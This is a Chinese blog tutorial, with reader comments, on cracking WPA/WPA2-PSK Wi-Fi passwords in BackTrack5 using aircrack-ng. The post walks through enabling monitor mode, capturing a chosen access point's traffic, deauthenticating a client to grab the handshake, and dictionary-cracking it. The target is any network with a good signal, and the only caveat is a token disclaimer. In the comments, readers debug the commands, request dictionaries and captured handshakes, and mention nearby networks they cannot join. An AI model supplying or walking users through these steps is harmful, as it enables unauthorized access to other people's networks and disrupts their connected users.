BackTrack5 (BT5)无线密码破解教程之WPA/WPA2-PSK型无线密码破解
昨天发布了BackTrack5 (BT5)无线wep密码破解教程之minidwep-gtk破解法 一文,对BT5下破解wep无线密码的简单方法做了介绍,今天奶牛为朋友们介绍下如何在bt5下破解wpa wpa2类型的无线密码。
前提:安装或者硬盘引导了BT5的gnome32位镜像,可以参看奶牛的文章BackTrack5硬盘引导+BT5硬盘安装全教程
虽然人们都说wpa的密码难破解,其实,嗯,确实是这样子,不仅仅靠技术,还要靠运气,这里就要用到一个强大的字典咯,木有一个好字典,破解密码灰常困难的说。好了,不卖关子了,说方法:
1.打开BT5的Wicd network manager,在application下的internet中。选择一个新号较好的AP(那样子用起来才爽嘛)。然后看它的properties,打开properties以后继续打开里面的属性看看这个AP的mac地址跟channel。
2.ifconfig看看自己的无线网卡的名称,一般是wlan0或者wifi0,后文中根据实际情况执行命令。
3.开启无线监控
airmon-ng start wlan0 6
注:wlan0为你的无线设备名称 6为你要开启的信道(但是这里的6其实并没有那么重要的说)
这一步你可能会看到提示有XXXX XXXX进程影响,没关系,kill XXX XXX XXX为给出的进程号,然后重新执行上句直到不报错
4.因为我们已经选择好了目标,我们就直奔目标AP,开始用BT5对其进行监控
airodump-ng -w nenew -c 4 --bssid AP‘s MAC mon0
这时候你应该可以看到如下图示:
5.根据上图,我们可以找到四个Client客户端的MAC地址,从里面随便选个(最好选择活跃点儿的)。打开一个新的终端,上一个终端不要关闭,后面还需要用到。在新终端中输入:
aireplay-ng -0 10 -a AP’s MAC -c CP’s MAC mon0
执行一次看第一个终端中是否出现了下图所示的标志WAP Handshake 。如果出现了,那么恭喜,你离成功已经不远了。如果没有出现就继续重复5的命令就ok了,直到出现握手。
6.对BT5握手抓到的包进行破解工作
aircrack-ng -w password.txt -b AP’s MAC nenew.cap
其中的password.txt为我们需要预置的字典文件,字典文件网上很多,搜搜就有了。奶牛也会放出自己的一些字典文件提供下载,继续关注咯。最后上成果图
本文只做技术讨论,不要用于非法用途,否则后果自负。
本文链接地址: BackTrack5 (BT5)无线密码破解教程之WPA/WPA2-PSK型无线密码破解
原创文章,转载请注明: 转载自奶牛博客
最近好文不断阿
我去,wpa也能这么嗨啊
wep没兴趣,WPA用这个也需要运气,没时间,有时候试试GPU
字典文件和密码强度都关系重大啊~
主要还是靠RP..
哼哼……我的路由即使有密码也没有用,已经做好MAC白名单了,其他机机连不上的~~~
mac可以伪造滴说…
这个……好吧,只有我宿舍里才能搜到信号,手动“杀机”
为什么我输入
airodump-ng -w nenew -c 4 -bssid 74:EA:31:54:B2:98 mon0
这句会出现
Notice: You specified “-bssid”. Did you mean “–bssid” instead?
Notice: Channel range already given
“airodump-ng –help” for help.
用 – - bssid
奶牛各还有问题请教;
我输入:
aircrack-ng -w ‘/media/3864185B64181DE6/setup/bt5/WPA.txt’ -b 94:0C:6D:35:1F:54 nenew.cap
这句显示:
Opening nenew.cap
open failed: No such file or directory
是路径问题还是什么?
奶牛哥还有问题请教;
我输入:
aircrack-ng -w ‘/media/3864185B64181DE6/setup/bt5/WPA.txt’ -b 94:0C:6D:35:1F:54 nenew.cap
这句显示:
Opening nenew.cap
open failed: No such file or directory
是路径问题还是什么?
是路径问题,-w 后面的路径没有’ ‘,你的”是把整个路径当作了一个文件,所以找不到文件…
ubuntu如何能播放wmv,这个文件java应该这样学#迅雷下载分享# dark_alex以176.00 KB/s的速度正在下载[如鹏原创-JAVA经典入门教程-JAVA应该这样学(1-7).rar][200.07 MB]http://convurl.com/xV1lss!只有声音没有画面,如何下载插件!网上逛了好久了,都没找到方法!奶牛实践下,谢谢啦
wmv是windows media player支持的video格式,linux下我没有测试过,你可以找下相应的解码,或者索性就找工具转化下格式试试…
第三步不懂
那步是开启对你无线设备的监控,就是它们发出或接收数据包的一个监控…
怎么打开呢
网卡支持否,可能不支持吧~~~
我的电脑是笔记本啊
第一步不懂啊
我Kill完进程后,却遇到了这样的问题,请问如何是好:
root@bt:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 Unknown rtl819xSE (monitor mode enabled)
root@bt:~# airodump-ng -w nenew -c 4 –bssid F4:EC:38:5C:70:6C mon0
Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device
root@bt:~#
奶牛~ 小灰工作了,附近好多網 木有一個能上- – 求你的字典文件~ 能否郵件到我的郵箱 萬謝啦~
牛哥 请问 什么是 CP’S MAC ?
牛哥 能给我发个握手包么?谢谢
了解了 注意看了下图片 呵呵
还请牛哥 给个握手包 谢谢
还有个问题求解 那个password.txt 我该把他放在哪 ?
我执行到了3阶段
出现2个 KILL
KILL完后 有3个
Interface chipset driver
继续执行4阶段提示
No sach drvice
请指教 谢谢
我想应该不是网卡问题 没输出命令的前提 可以连上自己的网络并上网站
求解 麻烦牛哥
怎么我一直显示没有CP呢?
你的第三步,那个6是比较重要的!一般默认可以不填,然后就会搜索所有频道的无线信号,你填的6就只会搜索6频道的。这一步就是为了检测对方的mac地址,真不知道你写的是6,怎么能得到频道1的mac地址……
1、airmon-ng start wlan0 6
【在频道6在mon0开启镜像扑获功能monitor mode enabled on mon0】
2、airodump-ng -w nenew -c 6 –bssid 00:13:46:BD:0A:C4 mon0
【从mon0利用6频道扑获无线AP的数据,保存到nenew.cap文件,通常在root目录下,如果扑获多次,则文件名递增nenew-001.cap】
【-w nenew:扑获文件名;-c 6 :频道6;00:13:46:BD:0A:C4:AP的MAC 】
3、aireplay-ng -0 10 -a 00:13:46:BD:0A:C4 -c 00:0C:F1:08:2D:A5 mon0
【此命令在另外一个新开启的CMD窗口运行,同时观察原窗口是否出现“[ WPA handshake: 00:13:46:BD:0A:”握手信号】
【-a :AP的MAC -c:客户机MAC ,此命令一旦写入CMD窗口,则客户机可能要断网】
4、aircrack-ng -w /root/WPA-password.txt -b 00:13:46:BD:0A:C4 /root/nenew-06.cap
【00:13:46:BD:0A:C4 AP的MAC】
【注意口令文件和扑获文件的路径】
第4步时,必须使用文件管理器参看nenew的文件名
aireplay-ng 始终不成功 是必须另开窗口吗 有什么返回显示吗
u盘装完bt5,一切正常。但是退出后怎么进入windows啊?只有windows vista loader,我win7.点了那个就重启。仲么办?